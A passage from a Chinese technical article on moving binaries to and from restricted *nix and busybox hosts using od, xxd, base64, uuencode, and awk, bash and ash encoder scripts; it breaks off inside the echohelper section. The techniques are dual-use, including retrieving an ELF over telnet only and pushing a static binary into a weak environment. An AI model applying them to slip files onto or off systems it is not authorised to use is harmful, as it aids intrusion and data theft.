标题: 非常规手段上传下载二进制文件
创建: 2000-07-17 14:57 更新: 2020-01-15 12:06 链接: https://scz.617.cn/unix/200007171457.txt
目录:
☆ od+xxd
☆ xxd
1) 方案1
2) 方案2
☆ base64
☆ uuencode/uudecode
1) uu编码
2) base64编码
☆ awk
1) base64decode.awk
2) base64.awk
3) uudecode.awk
4) uudecode_ash.awk
5) base64_ash.awk
☆ bash
1) xxd.sh
2) xxd_mini.sh
3) base64.sh
☆ ash
1) xxd.ash
2) echohelper.c
3) base64.ash
☆ openssl
☆ 小结
☆ perl
1) nc.pl
☆ /dev/tcp
1) 检查SSH banner
2) 访问"www.microsoft.com"
3) 从本机向远端传输文件
4) 从远端向本机传输文件
5) 开远程shell
☆ SecureCRT
1) 从Windows向Linux上传文件
1.1) ZMODEM(推荐)
1.2) YMODEM
1.3) XMODEM(不推荐)
1.4) KERMIT
2) 从Linux向Windows下载文件
2.1) ZMODEM(推荐)
2.2) YMODEM
2.3) XMODEM(不推荐)
2.4) KERMIT
3) 妖孽的Send ASCII/Recive ASCII/Send Binary
☆ zssh
☆ minicom
☆ 其他工具
1) ExtraPuTTY
☆ od+xxd
2000年时我和tt在一台远程主机上想把其中一个ELF弄回本地来逆向工程,目标只在 23/TCP上开了服务,其他端口不可达。远程主机上可用命令少得可怜,xxd、base64、 uuencode之类的都没有,但意外发现有个od。后来靠od把这个ELF从远程弄回了本地。
为了便于演示说明,生造一个二进制文件:
$ printf -v escseq \%o {0..255} $ printf "$escseq" > some
这是bash语法,ash不支持。
$ xxd -g 1 some 00000000: 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f ................ 00000010: 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f ................ 00000020: 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f !"#$%&'()*+,-./ 00000030: 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 0123456789:;<=>? 00000040: 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f @ABCDEFGHIJKLMNO 00000050: 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f PQRSTUVWXYZ[]^_ 00000060: 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f `abcdefghijklmno 00000070: 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f pqrstuvwxyz{|}~. 00000080: 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f ................ 00000090: 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f ................ 000000a0: a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af ................ 000000b0: b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf ................ 000000c0: c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf ................ 000000d0: d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df ................ 000000e0: e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef ................ 000000f0: f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff ................ $ xxd -p some 000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d 1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b 3c3d3e3f404142434445464748494a4b4c4d4e4f50515253545556575859 5a5b5c5d5e5f606162636465666768696a6b6c6d6e6f7071727374757677 78797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495 969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3 b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1 d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeef f0f1f2f3f4f5f6f7f8f9fafbfcfdfeff
xxd在Linux中很常见,但在其他非Linux的*nix环境中,od可能更常见。
$ od -An -tx1 -v --width=30 some &> some.txt
some.txt形如:
00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59
在远程主机上显示some.txt,设法把其中的内容原封不动地弄回本地来,比如录屏、 开启终端日志等等。然后在本地处理some.txt,恢复出some。
$ sed "s/ //g" some.txt &> some.tmp
如果远程主机上有sed,上面这步可以在远程主机进行,减少通过网络传输的文本数 据量。
some.tmp内容形如:
000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d 1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b 3c3d3e3f404142434445464748494a4b4c4d4e4f50515253545556575859
some.tmp的格式就是"xxx -p"的输出格式。
$ xxd -r -p some.tmp some
od本身只有数据转储功能,没有数据恢复功能。上面用"xxd -r"恢复出binary。
有人Ctrl-U断在U-Boot中,进行hexdump,然后恢复binary,本质是一样的。
☆ xxd
如果远程主机有xxd,整个过程类似。
1) 方案1
$ xxd -p some &> some.txt
some.txt形如:
000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d 1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b 3c3d3e3f404142434445464748494a4b4c4d4e4f50515253545556575859
xxd生成的some.txt已经是最精简形式,不需要sed再处理。
$ xxd -r -p some.txt some
2) 方案2
方案2演示xxd的其他参数,性价比不如方案1。
$ xxd -g 1 some some.txt
some.txt形如:
00000000: 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f ................ 00000010: 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f ................ 00000020: 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f !"#$%&'()*+,-./
$ xxd -r -s 0 some.txt some
☆ base64
https://en.wikipedia.org/wiki/Base64
原始数据
01 02 03
二进制表示
00000001 00000010 00000011
从8-bits一组变成6-bits一组
000000 010000 001000 000011
16进制表示
00 10 08 03
查表后转成:
A Q I D
上面是base64编码基本原理,没有考虑需要填充的情形。
如果远程主机可以对binary进行base64编码,就没什么好说的了。
$ base64 some > some.txt
some.txt形如:
AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4 OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3Bx cnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmq q6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj 5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/w==
$ base64 -d some.txt > some
本文假设针对*nix环境,不考虑vbscript、jscript这些存在。
base64编码比"xxd -p"省空间,前者一个字符代表6-bits,后者一个字符代表4-bits。
☆ uuencode/uudecode
https://en.wikipedia.org/wiki/Uuencoding
begin
If the source is not divisible by 3 then the last 4-byte section will
contain padding bytes to make it cleanly divisible. These bytes are
subtracted from the line's
uu编码如今已不多见。
1) uu编码
$ uuencode some some > some.txt
some.txt形如:
begin 644 some
M$"`P0%!@<("0H+#`T.#Q`1$A,4%187&!D:&QP='A\@(2(C)"4F)R@I*BLL
M+2XO,#$R,S0U-C<X.3H[/#T^/T!!0D-$149'2$E*2TQ-3D]045)35%565UA9
M6EM<75Y?8&%B8V1E9F=H:6IK;&UN;W!Q<G-T=79W>'EZ>WQ]?G^`@8*#A(6&
MAXB)BHN,C8Z/D)&2DY25EI>8F9J;G)V>GZ"AHJ.DI::GJ*FJJZRMKJ^PL;*S
MM+6VM[BYNKN\O;Z_P,'"P\3%QL?(R<K+S,W.S]#1TM/4U=;7V-G:V]S=WM_@
?X>+CY.7FY^CIZNOL[>[O\/'R\_3U]O?X^?K[_/W^_P
`
end
这是传统的uuencode编码
$ uudecode -o some some.txt
2) base64编码
某些uuencode命令支持base64
$ uuencode -m some some > some.txt
some.txt形如:
begin-base64 644 some AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKiss LS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZ WltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWG h4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKz tLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g 4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/w== ====
$ uudecode -o some some.txt
解码时不需要额外参数,靠第一行识别base64编码。"uuencode -m"产生的内容相比 base64产生的内容,多了第一行及最后一行:
begin-base64 644 some
把这两行删除后,就可以用"base64 -d"解码。
☆ awk
我们并不只考虑从远程主机下载binary,也考虑向远程主机上传binary。
如果目标环境有gcc,就弄个C代码实现base64编解码。本文不考虑宽松环境,像perl、 python、gcc之类的都不考虑。考虑目标环境存在awk。
1) base64decode.awk
https://github.com/shane-kerr/AWK-base64decode/blob/master/base64decode.awk
base64decode.awk
Introduction
============
Decode Base64-encoded strings.
Invocation
==========
Typically you run the script like this:
$ awk -f base64decode.awk [file1 [file2 [...]]] > output
The script implements Base64 decoding, based on RFC 3548:
https://tools.ietf.org/html/rfc3548
create our lookup table
BEGIN { # load symbols based on the alphabet for (i=0; i<26; i++) { BASE64[sprintf("%c", i+65)] = i BASE64[sprintf("%c", i+97)] = i+26 } # load our numbers for (i=0; i<10; i++) { BASE64[sprintf("%c", i+48)] = i+52 } # and finally our two additional characters BASE64["+"] = 62 BASE64["/"] = 63 # also add in our padding character BASE64["="] = -1 }
The main function to decode Base64 data.
Arguments:
* encoded - the Base64 string
* result - an array to return the binary data in
We exit on error. For other use cases this should be changed to
returning an error code somehow.
function base64decode(encoded, result) { n = 1 while (length(encoded) >= 4) { g0 = BASE64[substr(encoded, 1, 1)] g1 = BASE64[substr(encoded, 2, 1)] g2 = BASE64[substr(encoded, 3, 1)] g3 = BASE64[substr(encoded, 4, 1)] if (g0 == "") { printf("Unrecognized character %c in Base 64 encoded string\n", g0) >> "/dev/stderr" exit 1 } if (g1 == "") { printf("Unrecognized character %c in Base 64 encoded string\n", g1) >> "/dev/stderr" exit 1 } if (g2 == "") { printf("Unrecognized character %c in Base 64 encoded string\n", g2) >> "/dev/stderr" exit 1 } if (g3 == "") { printf("Unrecognized character %c in Base 64 encoded string\n", g3) >> "/dev/stderr" exit 1 }
# we don't have bit shifting in AWK, but we can achieve the same
# results with multiplication, division, and modulo arithmetic
result[n++] = (g0 * 4) + int(g1 / 16)
if (g2 != -1) {
result[n++] = ((g1 * 16) % 256) + int(g2 / 4)
if (g3 != -1) {
result[n++] = ((g2 * 64) % 256) + g3
}
}
encoded = substr(encoded, 5)
}
if (length(encoded) != 0) {
printf("Extra characters at end of Base 64 encoded string: \"%s\"\n",
encoded) >> "/dev/stderr"
exit 1
}
}
our main text processing
{ # Decode what we have read. base64decode($0, result)
# Output the decoded string.
#
# We cannot output a NUL character using BusyBox AWK. See:
# https://stackoverflow.com/a/32302711
#
# So we collect our result into an octal string and use the
# shell "printf" command to create the actual output.
#
# This also helps with gawk, which gets confused about the
# non-ASCII output if localization is used unless this is
# set via LC_ALL=C or via "--characters-as-bytes".
printf_str = ""
for (i=1; i in result; i++) {
printf_str = printf_str sprintf("\\%03o", result[i])
if (length(printf_str) >= 1024) {
system("printf '" printf_str "'")
printf_str = ""
}
delete result[i]
}
system("printf '" printf_str "'")
}
$ base64 some > some.txt
$ awk -f base64decode.awk some.txt > some $ busybox awk -f base64decode.awk some.txt > some
busybox不一定有nc,如果有awk就可以用前面这招。awk脚本执行效率很低,极端情 况下聊胜于无。base64decode.awk在一个很弱的busybox环境下成功解码。
2) base64.awk
https://sites.google.com/site/dannychouinard/Home/unix-linux-trinkets/little-utilities/base64-and-base85-encoding-awk-scripts
Danny Chouinard的原实现在做base64编码时没有正确处理结尾的=,他固定添加"=="。 这个问题不大,原脚本产生的编码输出可以被原脚本有效解码,但用其他工具解码原 脚本产生的编码输出时可能容错度不够。比如"scz@nsfocus"经原脚本编码产生 "c2N6QG5zZm9jdXM==",结尾多了一个=,用其他工具解码时表现各异:
$ echo "c2N6QG5zZm9jdXM==" | base64 -d scz@nsfocusbase64: invalid input $ echo "c2N6QG5zZm9jdXM==" | openssl enc -base64 -d (没有输出)
去掉base64编码结尾多余的=,对比测试:
$ echo "c2N6QG5zZm9jdXM=" | base64 -d scz@nsfocus $ echo "c2N6QG5zZm9jdXM=" | openssl enc -base64 -d scz@nsfocus
如果上下文都只用Danny Chouinard的原脚本,它的实现是最精简的。
下面是改过的版本,确保base64编码输出符合规范,以便与其他工具混合使用。其 base64编码功能无法直接处理binary,只能处理"xxd -p"这类输入,允许出现空格。 暂时没有找到用awk直接处理binary的办法。
!/usr/bin/awk -f
Author : Danny Chouinard
Modify : scz@nsfocus
function base64encode () { o = 0; bits = 0; n = 0; count = 0; while ( getline ) { for ( c = 0; c < length( $0 ); c++ ) { h = index( "0123456789abcdef", substr( $0, c+1, 1 ) ); if ( h-- ) { count++; for( i = 0; i < 4; i++ ) { o = o * 2 + int( h / 8 ) h = ( h * 2 ) % 16; if( ++bits == 6 ) { printf substr( base64table, o+1, 1 ); if( ++n >= maxn ) { printf( "\n" ); n = 0; } o = 0; bits = 0; } } } } } if ( bits ) { while ( bits++ < 6 ) { o = o * 2; } printf substr( base64table, o+1, 1 ); if( ++n >= maxn ) { printf( "\n" ); n = 0; } } count = int( count / 2 ) % 3; if ( count ) { for ( i = 0; i < 3 - count; i++ ) { printf( "=" ); if( ++n >= maxn ) { printf( "\n" ); n = 0; } } } if ( n ) { printf( "\n" ); } }
function base64decode () { o = 0; bits = 0; while( getline < "/dev/stdin" ) { for ( i = 0; i < length( $0 ); i++ ) { c = index( base64table, substr( $0, i+1, 1 ) ); if ( c-- ) { for ( b = 0; b < 6; b++ ) { o = o * 2 + int( c / 32 ); c = ( c * 2 ) % 64; if( ++bits == 8 ) { printf( "%c", o ); o = 0; bits = 0; } } } } } }
BEGIN \ { base64table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; maxn = 76;
if ( ARGV[1] == "d" )
{
base64decode();
}
else
{
base64encode();
}
}
$ xxd -p some | awk -f base64.awk > some.txt $ base64 some > some.txt
这两个输出完全相同。
base64解码时,必须关闭%c的UTF-8支持,下面两种办法均可:
$ LANG=C awk -f base64.awk d < some.txt > some $ awk --characters-as-bytes -f base64.awk d < some.txt > some
base64.awk直接使用awk的printf()。如果这个awk实际是由busybox提供的,此时可 能无法输出0x00,这点需要在目标环境实测:
$ awk 'BEGIN {printf "%c%c", 1, 0}' | xxd -g 1 00000000: 01 00 ..
$ /sbin/busybox-i686 awk 'BEGIN {printf "%c%c", 1, 0}' | xxd -g 1 00000000: 01 .
后者只输出了0x01。实测发现,如果试图先输出0x00,将直接截断,后面的0x01不会 被输出。
$ /sbin/busybox-i686 awk 'BEGIN {printf "%c%c", 0, 1}' | xxd -g 1 (没有输出)
可以调用shell的printf输出0x00,UTF-8困挠一并被规避,参看uudecode_ash.awk。
3) uudecode.awk
busybox提供的awk可能无法输出0x00,本脚本不适用于busybox环境。
!/usr/bin/awk -f
function looktable ( l, p ) { uutable = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_"; return index( uutable, substr( l, p+1, 1 ) ); }
/^[^be]/ \ { len = looktable( $0, 0 ); for ( i = 1; len > 0; i += 4 ) { a = looktable( $0, i ); b = looktable( $0, i+1 ); c = looktable( $0, i+2 ); d = looktable( $0, i+3 ); printf( "%c", a * 4 + b / 16 ); if ( len > 1 ) { printf( "%c", b * 16 + c / 4 ); if ( len > 2 ) { printf( "%c", c * 64 + d ); } } len -= 3; } }
$ uuencode some some > some.txt
$ LANG=C awk -f uudecode.awk < some.txt > some $ awk --characters-as-bytes -f uudecode.awk < some.txt > some
4) uudecode_ash.awk
!/bin/awk -f
function looktable ( l, p ) { uutable = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_"; return index( uutable, substr( l, p+1, 1 ) ); }
/^[^be]/ \ { len = looktable( $0, 0 ); n = 1; for ( i = 1; len > 0; i += 4 ) { a = looktable( $0, i ); b = looktable( $0, i+1 ); c = looktable( $0, i+2 ); d = looktable( $0, i+3 ); ret[n++] = ( a * 4 + b / 16 ) % 256; if ( len > 1 ) { ret[n++] = ( b * 16 + c / 4 ) % 256; if ( len > 2 ) { ret[n++] = ( c * 64 + d ) % 256; } } len -= 3; } escseq = ""; for ( i = 1; i in ret; i++ ) { escseq = escseq sprintf( "\x%02x", ret[i] ); delete ret[i]; } system( "printf \"" escseq "\"" ); }
$ uuencode some some > some.txt $ busybox awk -f uudecode_ash.awk < some.txt > some
此处不需要LANG=C,并且可以输出0x00,适用于busybox环境。
5) base64_ash.awk
从base64.awk移植出一个可以在busybox(ash+awk)中使用的版本。
!/bin/awk -f
Author : Danny Chouinard
Modify : scz@nsfocus
function base64encode () { o = 0; bits = 0; n = 0; count = 0; while ( getline ) { for ( c = 0; c < length( $0 ); c++ ) { h = index( "0123456789abcdef", substr( $0, c+1, 1 ) ); if ( h-- ) { count++; for( i = 0; i < 4; i++ ) { o = o * 2 + int( h / 8 ) h = ( h * 2 ) % 16; if( ++bits == 6 ) { printf substr( base64table, o+1, 1 ); if( ++n >= maxn ) { printf( "\n" ); n = 0; } o = 0; bits = 0; } } } } } if ( bits ) { while ( bits++ < 6 ) { o = o * 2; } printf substr( base64table, o+1, 1 ); if( ++n >= maxn ) { printf( "\n" ); n = 0; } } count = int( count / 2 ) % 3; if ( count ) { for ( i = 0; i < 3 - count; i++ ) { printf( "=" ); if( ++n >= maxn ) { printf( "\n" ); n = 0; } } } if ( n ) { printf( "\n" ); } }
function base64decode () { o = 0; bits = 0; while( getline < "/dev/stdin" ) { n = 1; for ( i = 0; i < length( $0 ); i++ ) { c = index( base64table, substr( $0, i+1, 1 ) ); if ( c-- ) { for ( b = 0; b < 6; b++ ) { o = o * 2 + int( c / 32 ); c = ( c * 2 ) % 64; if( ++bits == 8 ) { ret[n++] = o; o = 0; bits = 0; } } } } escseq = ""; for ( i = 1; i in ret; i++ ) { escseq = escseq sprintf( "\x%02x", ret[i] ); delete ret[i]; } system( "printf \"" escseq "\"" ); } }
BEGIN \ { base64table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; maxn = 76;
if ( ARGV[1] == "d" )
{
base64decode();
}
else
{
base64encode();
}
}
$ busybox od -An -tx1 -v some | busybox awk -f base64_ash.awk > some.txt $ busybox awk -f base64_ash.awk d < some.txt > some
此处不需要LANG=C,并且可以输出0x00,适用于busybox环境。
☆ bash
1) xxd.sh
这个脚本要求bash 4.3或更高版本,充斥着bash的各种奇技淫巧,如果读不懂,请看 bash(1)。
!/bin/bash
Read a file by bytes in BASH
https://stackoverflow.com/questions/13889659/read-a-file-by-bytes-in-bash
Author : F. Hauri
: 2016-09
Modify : scz@nsfocus
: 2018-10-08
: 2018-10-11 15:12
function hexdump () { printf -v escseq \%o {32..126} printf -v asciitable "$escseq" printf -v ctrltable %-20sE abtnvfr
if [ "$1" == "-p" ] ; then
printf -v spaceline %30s
fmt=${spaceline// /%02x}
else
printf -v spaceline %16s
fmt=${spaceline// / %02x}
fi
offset=0
hexarray=()
asciidump=
while LANG=C IFS= read -r -d '' -n 1 byte
do
if [ "$byte" ] ; then
printf -v escchar "%q" "$byte"
case ${#escchar} in
1|2 )
index=${asciitable%$escchar*}
hexarray+=($((${#index}+0x20)))
asciidump+=$byte
;;
5 )
tmp=${escchar#*\'\\}
index=${ctrltable%${tmp%\'}*}
hexarray+=($((${#index}+7)))
asciidump+=.
;;
7 )
tmp=${escchar#*\'\\}
hexarray+=($((8#${tmp%\'})))
asciidump+=.
;;
* )
echo >&2 Error: "[$escchar]"
;;
esac
else
hexarray+=(0)
asciidump+=.
fi
if [ "$1" == "-p" ] ; then
if [ ${#hexarray[@]} -gt 29 ] ; then
printf "$fmt\n" ${hexarray[@]}
((offset+=30))
hexarray=()
asciidump=
fi
else
if [ ${#hexarray[@]} -gt 15 ] ; then
printf "%08x:$fmt %s\n" $offset ${hexarray[@]} "$asciidump"
((offset+=16))
hexarray=()
asciidump=
fi
fi
done
if [ "$hexarray" ] ; then
if [ "$1" == "-p" ] ; then
fmt="${fmt:0:${#hexarray[@]}*4}"
printf "$fmt\n" ${hexarray[@]}
else
fmt="${fmt:0:${#hexarray[@]}*5}%$((48-${#hexarray[@]}*3))s"
printf "%08x:$fmt %s\n" $offset ${hexarray[@]} " " "$asciidump"
fi
fi
}
function revert () { hextable="0123456789abcdef" two=0 hh=
while LANG=C IFS= read -r -d '' -n 1 byte
do
if [ "$byte" ] ; then
printf -v escchar "%q" "$byte"
case ${#escchar} in
1 )
index=${hextable%${escchar,,}*}
index=${#index}
if [[ $index != 16 ]] ; then
((two+=1))
hh+=$escchar
if [[ $two == 2 ]] ; then
printf -v escseq "\\\\x%s" $hh
printf $escseq
two=0
hh=
fi
fi
;;
* )
;;
esac
fi
done
}
if [ "$1" != "-r" ] ; then hexdump $1 else revert fi
脚本中的-d ''很重要,否则读取\n时,\n被自动转成\0。
$ ./xxd.sh -p < some > some.txt $ xxd -p some > some.txt
这两个输出完全相同
some.txt形如:
000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d 1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b 3c3d3e3f404142434445464748494a4b4c4d4e4f50515253545556575859
$ ./xxd.sh -r < some.txt > some $ xxd -r -p some.txt some
这两个输出完全相同
"xxd.sh -r"的输入允许出现空格、换行等一切非16进制数字的字符,它们将被丢弃。 16进制数字大小写不敏感。
2) xxd_mini.sh
!/bin/bash
Author : scz@nsfocus
: 2018-10-08
: 2018-10-12 11:58
hexdump () { count=0
while LANG=C IFS= read -r -d '' -n 1 byte
do
LANG=C printf '%02x' "'$byte"
let count+=1
if [ $count -eq 30 ] ; then
printf "\n"
count=0
fi
done
if [ $count -ne 0 ] ; then
printf "\n"
fi
}
revert () { hextable="0123456789abcdef" two=0 hh=
while LANG=C IFS= read -r -n 1 byte
do
if [ "$byte" ] ; then
index=${hextable%${byte}*}
index=${#index}
if [[ $index != 16 ]] ; then
let two+=1
hh=$hh$byte
if [[ $two == 2 ]] ; then
printf "\x"$hh
two=0
hh=
fi
fi
fi
done
}
if [ "$1" != "-r" ] ; then hexdump $1 else revert fi
这个脚本不支持带ascii区的hexdump,即不支持"xxd -g 1"的效果,但支持"xxd -p"、 "xxd -r"的效果,作为上传、下载工具,足矣。
相比xxd.sh,xxd_mini.sh的语法有些陈旧,这是为了兼容ash,参看xxd.ash的说明。
$ ./xxd_mini.sh < some $ xxd -p some
这两个输出完全相同
$ ./xxd_mini.sh < some | ./xxd_mini.sh -r | xxd -g 1 $ xxd -p some | xxd -r -p | xxd -g 1
这两个输出完全相同
3) base64.sh
这个脚本使用了bash的语法,不能直接用于busybox的ash环境。如需兼容ash,参看 base64.ash。
!/bin/bash
Author : scz@nsfocus
: 2018-10-08
: 2018-10-16 17:46
function base64encode () { printf -v escseq \%o {32..126} printf -v asciitable "$escseq" printf -v ctrltable %-20sE abtnvfr
base64table="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
o=0
bits=0
n=0
maxn=76
count=0
while LANG=C IFS= read -r -d '' -n 1 byte
do
if [ "$byte" ] ; then
printf -v escchar "%q" "$byte"
case ${#escchar} in
1|2 )
index=${asciitable%$escchar*}
((hh=${#index}+0x20))
;;
5 )
tmp=${escchar#*\'\\}
index=${ctrltable%${tmp%\'}*}
((hh=${#index}+7))
;;
7 )
tmp=${escchar#*\'\\}
((hh=8#${tmp%\'}))
;;
* )
echo >&2 Error: "[$escchar]"
;;
esac
else
hh=0
fi
((count++))
for ((i=0;i<8;i++))
do
((o=o*2+hh/128))
((hh=hh*2%256))
((bits++))
if [[ $bits == 6 ]] ; then
printf ${base64table:$o:1}
((n++))
if [ $n -ge $maxn ] ; then
printf "\n"
n=0
fi
o=0
bits=0
fi
done
done
if [[ $bits != 0 ]] ; then
while [ $bits -lt 6 ]
do
((bits++))
((o*=2))
done
printf ${base64table:$o:1}
((n++))
if [ $n -ge $maxn ] ; then
printf "\n"
n=0
fi
fi
((count=count%3))
if [[ $count != 0 ]] ; then
for ((i=0;i<3-count;i++))
do
printf "="
((n++))
if [ $n -ge $maxn ] ; then
printf "\n"
n=0
fi
done
fi
if [ $n -ne 0 ] ; then
printf "\n"
fi
}
function base64decode () { base64table="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" o=0 bits=0
while LANG=C IFS= read -r -d '' -n 1 byte
do
if [ "$byte" ] ; then
c=${base64table%${byte}*}
c=${#c}
if [[ $c != 64 ]] ; then
#
# printf "%#x\n" $c
# continue
#
for ((b=0;b<6;b++))
do
((o=o*2+c/32))
((c=c*2%64))
((bits++))
if [[ $bits == 8 ]] ; then
printf -v escseq \\x5cx%x $o
printf $escseq
o=0
bits=0
fi
done
fi
fi
done
}
if [ "$1" != "-d" ] ; then base64encode else base64decode fi
$ echo -n -e "scz@nsfocus" | ./base64.sh c2N6QG5zZm9jdXM=
$ ./base64.sh < some > some.txt $ ./base64.sh -d < some.txt > some
☆ ash
bash很强大,而我们面临的很可能是busybox提供的ash,ash要比bash弱不少。
1) xxd.ash
!/bin/ash
Author : scz@nsfocus
: 2018-10-08
: 2018-10-12 11:58
hexdump () { count=0
while LANG=C IFS= read -r -n 1 byte
do
LANG=C printf '%02x' "'$byte"
let count+=1
if [ $count -eq 30 ] ; then
printf "\n"
count=0
fi
done
if [ $count -ne 0 ] ; then
printf "\n"
fi
}
revert () { hextable="0123456789abcdef" two=0 hh=
while LANG=C IFS= read -r -n 1 byte
do
if [ "$byte" ] ; then
index=${hextable%${byte}*}
index=${#index}
if [[ $index != 16 ]] ; then
let two+=1
hh=$hh$byte
if [[ $two == 2 ]] ; then
printf "\x"$hh
two=0
hh=
fi
fi
fi
done
}
if [ "$1" != "-r" ] ; then hexdump $1 else revert fi
xxd.ash实际就是xxd_mini.sh,编写后者时已经充分考虑了ash与bash的兼容性。
为了进行递增操作,使用了let关键字,ash很可能不支持(())。
不要写function关键字,busybox v1.19.3不认,v1.27.2才认。
ash不支持-d、-N,因此xxd.ash中read时删除了-d '',这导致脚本无法正确读取\n, 读进来时被自动转换成\0,在ash中找不到规避办法。
ash不支持${parameter,,pattern},无法将输入自动转换成小写,xxd.ash只能处理 全小写的some.txt。
xxd.ash的revert()可用,hexdump()不能正确转储\n。如果some中不包含\n,则可使 用xxd.ash的hexdump()。如果非要在弱环境中进行hexdump(),可以先用revert()上 传一个静态链接的ELF,此处不展开讨论。
2) echohelper.c
busybox的ash支持"echo -n -e",这可能是最笨的上传binary方案。写个辅助C程序 将指定binary转换成一系列echo命令。
/ * gcc -Wall -pipe -O3 -s -o echohelper echohelper.c /
include
include
include
include
include
include
int main ( int argc, char * argv[] ) { int ret = EXIT_FAILURE; int fd, i, n; unsigned char buf[16];
fd = open( argv[1], O_RDONLY, 0 );
if ( fd < 0 )
{
perror( "open" );
}
else
{
while ( ( n = read( fd, buf, sizeof( buf ) ) ) > 0 )
{
printf( "echo -n -e \"" );
for ( i = 0; i < n; i++ )
{
printf( "\\x%x", buf[i] );
}
printf( "\"\n" );
}
close( fd );
ret = EXIT_SUCCESS;
}
return( ret );
}
$ ./echohelper some > some.ash $ busybox ash some.ash > some
some.ash形如:
echo -n -e "\x0\x1\x2\x3\x4\x5\x6\x7\x8\x9\xa\xb\xc\xd\xe\xf" echo -n -e "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" echo -n -e "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f" echo -n -e "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" echo -n -e "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f" echo -n -e "\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" echo -n -e "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f" echo -n -e "\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" echo -n -e "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f" echo -n -e "\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" echo -n -e "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf" echo -n -e 